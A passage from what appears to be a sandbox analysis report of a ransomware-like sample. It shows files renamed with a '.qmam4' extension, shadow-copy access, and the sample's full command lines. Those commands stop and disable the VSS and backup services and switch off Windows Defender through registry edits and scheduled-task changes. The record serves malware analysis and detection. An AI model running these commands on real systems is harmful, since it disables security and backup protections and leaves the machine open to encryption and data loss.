| File opened for modification | C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\contrast-white\WideTile.scale-100_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL078.XML.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_KAAAACgAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\Assets\PhotosAppList.targetsize-60_altform-colorize.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\HoloAssets\HoloLens_HandTracking.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\30.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\sk-sk\ui-strings.js.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\ui-strings.js.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\ExchangeWideTile.scale-200.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019VL_MAK_AE-ul-oob.xrm-ms.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_FAAAABQAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN111.XML.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_PgAAAD4AAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\rsod\dcfmui.msi.16.en-us.boot.tree.dat.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_IgAAACIAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsCalculator_10.1906.55.0_neutral_split.scale-125_8wekyb3d8bbwe\AppxBlockMap.xml | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\sunec.jar.ktDJ2VdMixQTeiIUSjvpUWYmT0Zwz5x8UfktLjK81tn_MAAAADAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\State\keyValueLKG.dat | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\Logs\CBS\CBS.log | C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\pending.xml | C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe | N/A |
Launches sc.exe
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\MusNotifyIcon.exe | N/A |
| Key opened | \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\MusNotifyIcon.exe | N/A |
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\InternetConnectionCount = "0" | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UplinkBps = "0" | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\PriorityDownloadCount = "0" | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\NormalDownloadCount = "0" | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Settings | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadMonthlyLanBytes = "0" | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyInternetBytes = "0" | C:\Windows\System32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\GeoVersion_EndpointFullUri = "https://geover.prod.do.dsp.mp.microsoft.com/geoversion" | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownlinkBps = "0" | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadCount = "0" | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\DODownloadMode = "1" | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadMonthlyInternetBytes = "0" | C:\Windows\System32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\Geo_EndpointFullUri = "https://geo.prod.do.dsp.mp.microsoft.com/geo" | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\SwarmCount = "1" | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownlinkUsageBps = "0" | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\KVFileExpirationTime = "132897432933229199" | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\PeerInfoCount = "0" | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\GroupConnectionCount = "0" | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateBkBps = "0" | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MemoryUsageKB = "3908" | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyCacheHostBytes = "0" | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MonthID = "2" | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\LANConnectionCount = "0" | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadRatePct = "100" | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\DownloadMode_BackCompat = "1" | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyLinkLocalBytes = "0" | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyCdnBytes = "0" | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MonthlyUploadRestriction = "0" | C:\Windows\System32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CPUpct = "0.006584" | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MemoryUsageKB = "4316" | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\SwarmCount = "0" | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyLanBytes = "0" | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CDNConnectionCount = "0" | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\FrDownloadRatePct = "90" | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\NormalDownloadPendingCount = "0" | C:\Windows\System32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CPUpct = "7.594226" | C:\Windows\System32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CPUpct = "9.373302" | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyGroupBytes = "0" | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateFrCnt = "0" | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UplinkUsageBps = "0" | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\BkDownloadRatePct = "45" | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\PriorityDownloadPendingCount = "0" | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MemoryUsageKB = "4120" | C:\Windows\System32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CPUpct = "21.604469" | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateFrBps = "0" | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateBkCnt = "0" | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CacheSizeBytes = "0" | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\LinkLocalConnectionCount = "0" | C:\Windows\System32\svchost.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe
"C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe"
C:\Windows\SYSTEM32\net.exe
net.exe stop "SamSs" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "SDRSVC" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "SstpSvc" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "vmicvss" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "vmicvss" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "VSS" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "wbengine" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "WebClient" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "UnistoreSvc_1ccfd" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UnistoreSvc_1ccfd" /y
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SamSs" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SDRSVC" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SstpSvc" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "vmicvss" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "VSS" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "wbengine" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "WebClient" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "UnistoreSvc_1ccfd" start= disabled
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\MusNotifyIcon.exe
%systemroot%\system32\MusNotifyIcon.exe NotifyTrayIcon 13
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
